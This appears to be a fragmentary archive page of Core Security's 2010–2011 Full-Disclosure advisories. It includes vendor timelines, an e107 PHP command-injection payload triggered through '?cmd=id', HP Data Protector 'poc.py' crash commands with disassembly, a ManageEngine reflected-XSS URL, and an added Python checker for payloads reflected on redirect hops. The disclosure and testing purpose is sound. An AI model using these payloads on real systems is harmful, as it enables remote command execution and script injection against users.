quote, a semicolon and PHP code, that code is executed whenever the
config file is requested.

4. *Vulnerable packages*
 . e107 0.7.24
 . Older versions are probably affected too, but they were not checked.

5. *Vendor Information, Solutions and Workarounds*

The e107 team has issued a patch for this issue in revision 12375 [1] of
its SVN repository. The development version of e107 was also patched, in
revision 12376 [2].


6. *Credits*

This vulnerability was discovered and researched by Matt Bergin and
Matias Blanco.
The publication of this advisory was coordinated by Fernando Russ.

7. *Technical Description / Proof of Concept Code*

A possible value for the MySQL server parameter is:

/-
localhost:63306';system($_GET['cmd']);$a='1

- -/
Then, when the e107_config.php page is requested as
http://www.example.com/e107_config.php?cmd=id, the command "id" is
executed on the server.
 

8. *Report Timeline*
  
. 2011-10-03:
Technical details sent to the vendor.
. 2011-10-03:
The e107 security team asks Core for a technical description
of the vulnerability.
. 2011-10-03:
Core sends the technical description of the vulnerability.
. 2011-10-21:
The e107 security team reports that the vulnerability was fixed and that
the fix is now live in SVN for wider testing (changesets 12375 and 12376).
. 2011-10-21:
Core provides the CVE for this vulnerability.
. 2011-10-24:
Advisory CORE-2011-0810 is published.
 

9. *References*

[1] SVN reference to the patch for this issue in e107 (v0.7)
http://e107.svn.sourceforge.net/viewvc/e107?view=revision&revision=12375
[2] SVN reference to the patch for this issue in e107 (v0.8) (devel)
http://e107.svn.sourceforge.net/viewvc/e107?view=revision&revision=12376


12. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAk6ljIgACgkQyNibggitWa113wCeISjoKNw2ab7IgWEJyvf3uU3U
qIEAoJspzi1JyLPBaD9VrKUxJ2gmzr6H
=UtMA
-END PGP SIGNATURE-


[Full-disclosure] CORE-2011-0106: Microsoft Publisher 2007 Pubconv.dll Memory Corruption

2011-10-12 Thread CORE Security Technologies Advisories


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.17 (MingW32)

iEYEARECAAYFAk6Vy/QACgkQyNibggitWa2TvgCgma9wKGM0AtLP5zxwjHVnUjXr
P0UAn2l4X7d9JJm9JYa+lAYG1hPPYl4w
=wGj/
-END PGP SIGNATURE-



[Full-disclosure] CORE-2011-0506 - Multiples Vulnerabilities in ManageEngine ServiceDesk Plus

2011-09-14 Thread CORE Security Technologies Advisories


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.





[Full-disclosure] CORE-2011-0526 - MS WINS ECommEndDlg Input Validation Error

2011-09-12 Thread CORE Security Technologies Advisories


12. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.





[Full-disclosure] CORE-2011-0606: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability

2011-06-29 Thread CORE Security Technologies Advisories
t.0041D1F7
[...]
0041D1F7 |> 8B45 0C/MOV EAX,DWORD PTR SS:[EBP+C]
0041D1FA |. 0FB708 |MOVZX ECX,WORD PTR DS:[EAX]
0041D1FD |. 85C9   |TEST ECX,ECX
0041D1FF |. 74 26  |JE SHORT omniinet.0041D227
0041D201 |. 8B55 08|MOV EDX,DWORD PTR SS:[EBP+8]
0041D204 |. 8955 FC|MOV DWORD PTR SS:[EBP-4],EDX
0041D207 |. 8B45 08|MOV EAX,DWORD PTR SS:[EBP+8]
0041D20A |. 8B4D 0C|MOV ECX,DWORD PTR SS:[EBP+C]
0041D20D |. 66:8B11|MOV DX,WORD PTR DS:[ECX]
0041D210 |. 66:8910|MOV WORD PTR DS:[EAX],DX // copy WORDs to the stack
0041D213 |. 8B45 08|MOV EAX,DWORD PTR SS:[EBP+8]
0041D216 |. 83C0 02|ADD EAX,2
0041D219 |. 8945 08|MOV DWORD PTR SS:[EBP+8],EAX
0041D21C |. 8B4D 0C|MOV ECX,DWORD PTR SS:[EBP+C]
0041D21F |. 83C1 02|ADD ECX,2
0041D222 |. 894D 0C|MOV DWORD PTR SS:[EBP+C],ECX
0041D225 |.^EB D0  \JMP SHORT omniinet.0041D1F7
0041D227 |> 8B55 08MOV EDX,DWORD PTR SS:[EBP+8]
0041D22A |. 66:C702    MOV WORD PTR DS:[EDX],0
0041D22F |. 8B45 FCMOV EAX,DWORD PTR SS:[EBP-4]
0041D232 |. 8BE5   MOV ESP,EBP
0041D234 |. 5D POP EBP
0041D235 \. C3 RETN

- -/



9. *Report Timeline*

. 2011-06-06:
Core Security Technologies notifies the HP team of the vulnerabilities
and provides the technical details. Publication date is temporarily set
to July 5th, 2011.

. 2011-06-06:
Vendor confirms that a new case was assigned within HP Software Security
Response Team (SSRT).

. 2011-06-16:
Core requests an update on this issue, in particular Core asks the
vendor for a technical analysis of the bugs, a list of affected products
and versions, and the vendor's plan for providing a fix (no reply
received).

. 2011-06-23:
Core requests an update once more.

. 2011-06-28:
Vendor communicates that a security bulletin will be issued on the same
day (June 28). The vendor confirms the vulnerabilities and recommends
enabling encrypted communications on the cell server and clients as a
mitigation.

. 2011-06-28:
Core requests a link to the vendor's bulletin, and asks whether CVE ids
have been assigned.

. 2011-06-28:
Vendor provides a link to the bulletin and CVE names for the
vulnerabilities.

. 2011-06-29:
Advisory CORE-2011-0606 is published.



10. *References*

[1] HP Data Protector http://hp.com/go/dataprotector
[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,
Remote Execution of Arbitrary Code
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182




13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAk4LnZsACgkQyNibggitWa07/ACfSlzkBvbowAskeP/K4FqtxCay
EAkAnRCPKdc35t5Cb0ZJbGy4me4JRALo
=zHon
-END PGP SIGNATURE-



[Full-disclosure] CORE-2011-0514: Multiple vulnerabilities in HP Data Protector

2011-06-29 Thread CORE Security Technologies Advisories
.*

[CVE-2011-1865] This vulnerability is reproduced with the following command:
 "poc.py 127.0.0.1 46 1 30 17"
 A stack overflow is produced by calling the function swprintf from
position 0x0040A708.


8.6. *Vulnerability 6. Opcode 27.*

[CVE-2011-1865] This vulnerability is reproduced with the following command:
 "poc.py 127.0.0.1 27 1 30 3"
 A stack overflow is produced by calling the function swprintf from
position 0x0040AD53.


8.7. *Vulnerability 7. Opcode 17.*

[CVE-2011-1865] This vulnerability is reproduced with the following command:
 "poc.py 127.0.0.1 17 1 30 6"
 A stack overflow is produced by calling the function swprintf from
position 0x0040FC05.


8.8. *Vulnerability 8. Opcode 11.*

[CVE-2011-1514] This vulnerability is reproduced with the following command:
 "poc.py 127.0.0.1 11 1 7 6"
 This causes a null pointer dereference.

/-
eax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490 edi=00000000
eip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000 efl=00010212
omniinet+0x7ed0:
00407ed0 8b10 mov edx,[eax] ds:0023:00000014=????????

007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0
007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e
007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b
007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02
007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c
007cffb4 7c80b713 00156490 00000000 0012e7f8 ADVAPI32!CryptVerifySignatureW+0x29
007cffec 00000000 77df3519 00156490 00000000 kernel32!GetModuleFileNameA+0x1b4

- -/


8.9. *Vulnerability 9. Opcode 20.*

[CVE-2011-1515] This vulnerability is reproduced with the following command:
 "poc.py 127.0.0.1 20 1 7 6"
 The process terminates without generating an exception, resulting in a
denial of service condition.


9. *Report Timeline*

. 2011-06-02:
Core Security Technologies notifies HP Security Alert team of the
vulnerabilities. Publication date is temporarily set to July 5th, 2011.

. 2011-06-06:
Vendor acknowledges receipt.

. 2011-06-06:
Core sends technical details to the vendor.

. 2011-06-06:
Vendor confirms that a new case was assigned within HP Software Security
Response Team (SSRT).

. 2011-06-16:
Core requests an update on this issue, in particular Core asks the
vendor for a technical analysis of the bugs, a list of affected products
and versions, and the vendor's plan for providing a fix (no reply
received).

. 2011-06-23:
Core requests an update once more.

. 2011-06-28:
Vendor communicates that a security bulletin will be issued on the same
day (June 28). The vendor confirms the vulnerabilities and recommends
enabling encrypted communications on the cell server and clients as a
mitigation.

. 2011-06-28:
Core requests a link to the vendor's bulletin, and asks whether CVE ids
have been assigned.

. 2011-06-28:
Vendor provides a link to the bulletin and CVE names for the
vulnerabilities.

. 2011-06-29:
Advisory CORE-2011-0514 is published.


10. *References*

[1] HP Data Protector http://hp.com/go/dataprotector
[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,
Remote Execution of Arbitrary Code
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182




13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commerc

[Full-disclosure] CORE-2010-1021: IBM WebSphere Application Server Cross-Site Request Forgery

2011-06-15 Thread CORE Security Technologies Advisories
11-02-17:
Core replies that it has rescheduled publication of its advisory (for
the second time) to March 21, 2011, in order to give PSIRT more time to
come up with concrete responses to the requested information. Core
provides additional information about its own publication process [5].
Without additional information, it is difficult for Core to understand
the reason why users of vulnerable WebSphere software should remain
without any solution until Q3 2011.

. 2011-03-17:
After a month of silence, the vendor informs Core that IBM's point of
contact for this issue has changed, and that further communications will
be handled by the head of IBM's Secure By Design initiative which
includes the IBM PSIRT.

. 2011-03-17:
Vendor requests Core to postpone the publication of its advisory until
early October 2011.

. 2011-03-18:
Vendor communicates that since Core hasn't responded to the request
(sent the previous day) of deferring the public disclosure of this
security vulnerability from 21 March to early October 2011, IBM
considers that Core agrees.

. 2011-03-21:
Core answers that October 2011 is well beyond what it considers a
reasonable timeframe to patch the type of bug it has reported (a
Cross-Site Request Forgery). Additionally, the vendor has not provided
Core with a technical analysis of the bug explaining why it is difficult
to patch (and why it would take IBM around 10 months to release fixes),
nor the requested list of affected products and versions. According to
Core's publication policy, the decision to postpone the publication of
an advisory cannot be taken without technical arguments that justify
it. This is why Core cannot agree to IBM's request to postpone
publication until October 2011 unless the vendor provides the requested
technical information.
(No reply received.)

. 2011-04-25:
Core informs the vendor that it has rescheduled the publication of
its advisory to June 14th, 2011. That date corresponds to a 6 month
timeframe after technical details about this vulnerability were sent to
IBM (on December 14th, 2010), and is considered final. (No reply received.)

. 2011-06-15:
The advisory CORE-2010-1021 is published.


10. *References*

[1] IBM WebSphere Application Server:
http://www-01.ibm.com/software/webservers/appserv/was/

[2] Cross-Site Request Forgery (CSRF)
http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29

[3] Application Boundaries Enforcer (ABE)
http://noscript.net/abe/

[4] The author participated in Core Security's Bugweek 2010 as member of
the team "Ex Tester fuErTes and Exploit Testers".

[5] Finding bugs and publishing advisories: the Core Security way
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Finding_bugs_and_publishing_advisories

[6] IBM WebSphere Reference, Global Security settings:
http://publib.boulder.ibm.com/infocenter/wasinfo/fep/topic/com.ibm.websphere.nd.multiplatform.doc/info/ae/ae/usec_secureadminappinfra.html




14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CORE-2011-0203 - MS HyperV Persistent DoS Vulnerability

2011-06-14 Thread CORE Security Technologies Advisories

[Full-disclosure] CORE-2010-0908: Lotus Notes XLS viewer malformed BIFF record heap overflow

2011-05-24 Thread CORE Security Technologies Advisories
vendor's plan to
produce fixes. Publication of Core's advisory is rescheduled for May
23rd, 2011.

. 2011-04-28:
Vendor replies that it will provide an update by the end of the week.

. 2011-05-04:
Vendor requests targeting May 24th for the publication of this
vulnerability.

. 2011-05-04:
Core agrees to reschedule for May 24th, requests a list of vulnerable
versions, and offers to include a vendor statement in its advisory.

. 2011-05-19:
Vendor replies that it is preparing an advisory which will outline the
fixes and options available. Vendor states that this vulnerability would
impact all current releases. Vendor asks whether a CVE has been assigned
to the vulnerability.

. 2011-05-20:
Core provides the CVE name assigned to the issue, and requests
additional information to be included in its advisory.

. 2011-05-24:
Vendor provides a link to its security alert, which includes information
about fixes and workarounds.

. 2011-05-24:
The advisory CORE-2010-0908 is published.





[Full-disclosure] CORE-2011-0204: Adobe Audition vulnerability processing malformed session file

2011-05-12 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2010-1118: Oracle GlassFish Server Administration Console Authentication Bypass

2011-05-11 Thread CORE Security Technologies Advisories
Oracle notifies that:

   . This issue affects Sun GlassFish Enterprise Server 2.1.1 and Oracle
GlassFish Server 3.0.1.
   . Oracle GlassFish Server 3.1 was released in March 2011 and was
fixed before the release, so it is not affected.
   . The fix review, integration, test and release cycles run on
predetermined schedules. Oracle is not delaying any fixes.
   . As a policy, Oracle does not provide workarounds unless they can be
easily applied by every customer.
   . Fixes have been integrated; all the final patches should be
available in July.

. 2011-05-05:
Core decides to release the advisory the following Wednesday, May 11th,
and lists the sequence of events that motivated that decision:

   . Oracle was notified of the vulnerability 5 months ago.
   . Oracle released a fixed version of GlassFish (March 2011) without
notifying Core, without patching previous versions and without
publishing any workaround for affected users.
   . Core has a workaround that mitigates the vulnerability.

 Core sends the proposed workaround [Sec. 6.1] to the Oracle team and
asks if they want to add further information to the advisory.

. 2011-05-06:
Oracle requests that Core hold the advisory publication until patches
are available for all customers. Oracle states that it announces
security fixes on a pre-determined schedule so that users are prepared
to apply them; ad hoc publication of issues may not allow every customer
to monitor and apply patches in time, which increases their exposure.

. 2011-05-09:
Core replies that the publication of security advisories is aimed at
explaining the problem to the vulnerable user community and providing
the technical details and guidance they need to devise protective
countermeasures. Core usually releases this information in coordination
with the vendor, but in this case that is not possible because Oracle
has already released patches for some versions (without notifying Core).
Currently there is a patched version of GlassFish alongside vulnerable
versions with exposed users. In this scenario Core has decided to
release the advisory as a 'user release' next Wednesday, providing a way
to mitigate the problem until patches are available. The vendor (Oracle
in this case) may or may not agree with Core's assessment of how to help
users reduce risk, but the vendor is certainly not the only party
entitled to provide plausible solutions to the problem.

. 2011-05-11:
Advisory CORE-2010-1118 is published.





[Full-disclosure] CORE-2011-0208: VLC Vulnerabilities handling .AMV and .NSV files

2011-03-23 Thread CORE Security Technologies Advisories


[Full-disclosure] CORE-2011-0103 - ZOHO ManageEngine ADSelfService multiple vulnerabilities

2011-02-10 Thread CORE Security Technologies Advisories
by following a link to:

/-
http://SERVER/EmployeeSearch.cc?actionId=Search&parameterName=name&searchType=contains&searchString=alice%22+onMouseOver%3D%22javascript%3Aalert%28%27xss%27%29
-/
 The reflection is not obvious at first sight: because the Search action
redirects, the page source visible once the request completes is that of
the showList page. The reflected payload is easy to see, however, if the
intermediate response is captured on the wire with an intercepting proxy.

Additionally, since invoking
'http://SERVER/EmployeeSearch.cc?actionId=Search' causes a redirection
to 'http://SERVER/EmployeeSearch.cc?actionId=showList', any input that
triggers a vulnerability in the latter page can also be supplied to the
former with the same result.

It is important to note that, since the cross-site scripting
vulnerabilities were detected while investigating the authentication
bypass issues and were considered a secondary matter, the pages
containing them were not thoroughly tested. Other, similar cross-site
scripting vulnerabilities may therefore remain undetected.


9. *Report Timeline*

. 2011-01-11:
Initial notification to the vendor. Publication date set to February
2nd, 2011.

. 2011-01-13:
The Zoho team asks Core for a technical description of the vulnerability.

. 2011-01-13:
Technical details sent to Zoho team by Core.

. 2011-01-17:
The Zoho team acknowledges receipt of the advisory draft and asks for a
contact phone number to discuss these flaws.

. 2011-01-17:
The Core team states its preference for keeping the whole communication
process in email, in order to track all interactions and to involve all
interested parties:

   1. the Core Security Advisories Team,
   2. the Zoho team and,
   3. the discoverer of the vulnerability.

 If there is something that cannot be resolved via email, Core team can
eventually send a phone number to set up a conference call, but that is
not necessary at the moment.

. 2011-01-20:
The Zoho team notifies that the vulnerabilities highlighted in the
document will be addressed in the upcoming release of ADSelfService
Plus, scheduled to be released before Feb. 11th.

. 2011-01-21:
Core notifies that the advisory was re-scheduled to Feb. 10th, and asks
whether the Zoho team is going to release a security bulletin regarding
these vulnerabilities.

. 2011-01-28:
The Zoho team notifies that they are on schedule for the release of the
new version of ADSelfService Plus. Zoho plans to publish a report on
these vulnerabilities, including solutions and workarounds.

. 2011-02-07:
Core asks if Zoho team will be ready for disclosure next Thursday Feb
10th in order to coordinate the advisory publication.

. 2011-02-08:
The Zoho team notifies that they are ready with the Engineering Release
version ADSelfService Plus 4.5 Build 4500, which addresses all the
security vulnerabilities highlighted by this advisory. Zoho is going to
make a public announcement tomorrow.

. 2011-02-10:
The advisory CORE-2011-0103 is published.


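The ADSelfService advisory above makes a point worth carrying into any web
assessment: a reflected payload that lands in a response which immediately
redirects is invisible to a browser's "view source" and to any HTTP client
that follows redirects, and only shows up when each hop is inspected on the
wire. The following is an added example, not code from the Core advisory or
from ManageEngine. It runs a constructed local stand-in for the behaviour
described (the Search action echoes searchString unescaped into a 302
response body and redirects to showList, whose source no longer contains the
payload) and a checker that reads every hop the way an intercepting proxy
sees it. The stand-in server, its paths, parameters and responses are
assumptions for illustration only.

```python
"""Check for a reflected payload on every HTTP hop, not only on the final page.

Added example, not code from the Core advisory or from ManageEngine. The
stand-in server, its paths and its responses are constructed for
illustration; the checker itself is generic.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode, urlsplit

# Same shape as the advisory's payload: close the quoted attribute, add a handler.
PAYLOAD = 'alice" onMouseOver="javascript:alert(\'xss\')'
MARKER = 'onMouseOver="javascript:alert'
REDIRECT_CODES = {301, 302, 303, 307, 308}


class FakeSelfService(BaseHTTPRequestHandler):
    """Constructed stand-in: Search reflects the term in a 302 body, showList is clean."""

    def do_GET(self):
        url = urlsplit(self.path)
        qs = parse_qs(url.query)
        action = qs.get("actionId", [""])[0]
        if url.path == "/EmployeeSearch.cc" and action == "Search":
            term = qs.get("searchString", [""])[0]
            # Vulnerable behaviour: the term lands unescaped in a page the
            # browser never displays because of the Location header.
            body = f'<input name="searchString" value="{term}">'.encode()
            self.send_response(302)
            self.send_header("Location", "/EmployeeSearch.cc?actionId=showList")
        elif url.path == "/EmployeeSearch.cc" and action == "showList":
            body = b"<html><body>Employee list</body></html>"
            self.send_response(200)
        else:
            body = b"not found"
            self.send_response(404)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


def fetch_hops(host, port, path, max_hops=5):
    """GET `path` and return [(status, body), ...] for every hop.

    http.client never follows redirects, so each intermediate response is
    captured exactly as sent, which is what a redirect-following client hides.
    """
    hops = []
    for _ in range(max_hops):
        conn = http.client.HTTPConnection(host, port, timeout=5)
        conn.request("GET", path)
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", "replace")
        location = resp.getheader("Location")
        conn.close()
        hops.append((resp.status, body))
        if resp.status not in REDIRECT_CODES or not location:
            break
        path = location  # relative Location, as the stand-in emits it
    return hops


def check_reflection(host, port):
    """Send the payload through the Search action and report where it reflects."""
    path = "/EmployeeSearch.cc?" + urlencode({
        "actionId": "Search", "parameterName": "name",
        "searchType": "contains", "searchString": PAYLOAD})
    hops = fetch_hops(host, port, path)
    return {
        "hop_count": len(hops),
        "statuses": [status for status, _ in hops],
        # Hops whose body carries the payload verbatim, i.e. unencoded.
        "reflected_hops": [i for i, (_, body) in enumerate(hops) if MARKER in body],
        # What a browser's "view source" or a redirect-following fetch shows.
        "final_page_reflects": MARKER in hops[-1][1],
    }


def run_demo():
    """Start the stand-in on an ephemeral port, run the check, shut it down."""
    server = HTTPServer(("127.0.0.1", 0), FakeSelfService)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return check_reflection("127.0.0.1", server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_demo())
```

Against the constructed server the result reports two hops (302 then 200),
the payload reflected unencoded in hop 0 only, and a final page that does
not contain it; a scanner that judges only the final page would mark this
parameter clean. To use the checker against a real target, drop the stand-in
and point fetch_hops at the host and path under test.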

[Full-disclosure] [CORE-2010-1001] Cisco WebEx .atp and .wrf Overflow Vulnerabilities

2011-01-31 Thread CORE Security Technologies Advisories


[Full-disclosure] [CORE-2010-0728] Symantec Intel Handler Service Remote Denial-of-Service

2010-12-13 Thread Core Security Technologies Advisories
d release date for the end of September.

. 2010-08-27:
Core agrees with the estimated release date, and requests the date of
the initial report of the vulnerability.

. 2010-09-09:
After two weeks with no replies, Core again requests the date of the
initial report of the vulnerability, and asks if the release of the fix
is still on track for the end of September.

. 2010-09-16:
Vendor replies that they will not be able to release fixes before the
end of the year, as they have to correct third-party code by themselves.

. 2010-09-21:
Core requests confirmation that the vendor won't release a fix before
the end of the year.

. 2010-09-22:
Vendor confirms that they won't be able to release fixes until the end
of the year, as fixing third-party code is taking time. However, the
vendor explains that current versions of the product have the vulnerable
functionality disabled, that old versions of the product do not install
the vulnerable functionality by default, and that installation of this
functionality is not recommended.

. 2010-10-05:
Core requests version numbers for vulnerable and non-vulnerable versions
of the software, and asks if vulnerable users can update to a
non-vulnerable version.

. 2010-10-06:
Vendor replies with the version numbers and confirms that vulnerable
users have to wait for the patch.

. 2010-10-07:
Core decides to postpone the publication date and wait for the release
of the patch.

. 2010-10-22:
Core asks Symantec for a precise release date for the fixes, and
explains that the publication of the advisory won't be pushed further
than December 2010.

. 2010-10-23:
Vendor replies that the last known date was during December, and that
they will confirm a firmer date.

. 2010-11-01:
Core asks Symantec if a firmer release date has been confirmed.

. 2010-11-03:
Vendor replies that the engineering team has not confirmed a release
date, and asks if Core can hold the publication of the advisory until
the end of the year.

. 2010-11-25:
Core replies that the December 13th release date is fixed, and requests
an update on the status of the patches.

. 2010-12-13:
No update received, advisory CORE-2010-0728 is published.





12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].




[Full-disclosure] CORE-2010-1109 - Multiple vulnerabilities in BugTracker.Net

2010-11-30 Thread CORE Security Technologies Advisories

[Full-disclosure] CORE-2010-1018 - Landesk OS command injection

2010-11-10 Thread CORE Security Technologies Advisories
and also sends the workaround described in [Sec. 6].

. 2010-11-08:
The LANDesk team requests that the advisory publication be postponed by
24 hours, given that they will not be ready by the scheduled date.

. 2010-11-09:
Core re-schedules the advisory publication to November 10th.

. 2010-11-10:
The advisory CORE-2010-1018 is published.


10. *References*

[1] LANDesk website [http://www.landesk.com/].


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://corelabs.coresecurity.com].


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].






[Full-disclosure] [CORE-2010-0825] Apple OS X ATSServer CFF CharStrings INDEX Sign Mismatch

2010-11-08 Thread CORE Security Technologies Advisories
f October without a firm date of publication.

. 2010-08-31:
Apple asks Core about credit information for the advisory.

. 2010-09-28:
Core acknowledges the communication, sending the credit information for
this report.

. 2010-10-20:
Core asks Apple for a firm date for the release of this security issue,
since the initially proposed timeframe of October 18th is due.

. 2010-10-22:
Apple acknowledges the communication, informing that the publication date
is scheduled for the week of October 25th. Apple also notifies that the
assigned identifier for this vulnerability is CVE-2010-1797.

. 2010-11-01:
Core asks Apple for a new schedule for the publication, since there was
no notice of any Apple security update during the week of October 25th.

. 2010-11-01:
Apple acknowledges the communication, informing that the publication date
was rescheduled to the middle of the week of November 1st.

. 2010-11-03:
Core informs Apple that the publication of this advisory has been
scheduled for Monday 8th; taking into account the last communication,
this is a final publication date. Core also informs that the information
about how this vulnerability was found and how it can be exploited will
be discussed at a small local infosec event in Buenos Aires.

. 2010-11-08:
Core publishes advisory CORE-2010-0825.



9. *References*

[1] [http://en.wikipedia.org/wiki/PostScript_fonts#Compact_Font_Format]


10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://corelabs.coresecurity.com].


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].


12. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkzYayoACgkQyNibggitWa2PMgCfSvLwR5OgWfmFIwpONWL+dMa3
njEAnjIZFF+zG/wWK3IscWx3VyNW5F30
=XULv
-----END PGP SIGNATURE-----



[Full-disclosure] [CORE-2010-0819] LibSMI smiGetNode Buffer Overflow When Long OID Is Given In Numerical Form

2010-10-20 Thread CORE Security Technologies Advisories
ge
Maintainer for libsmi, informing that a bug has been found in libsmi.
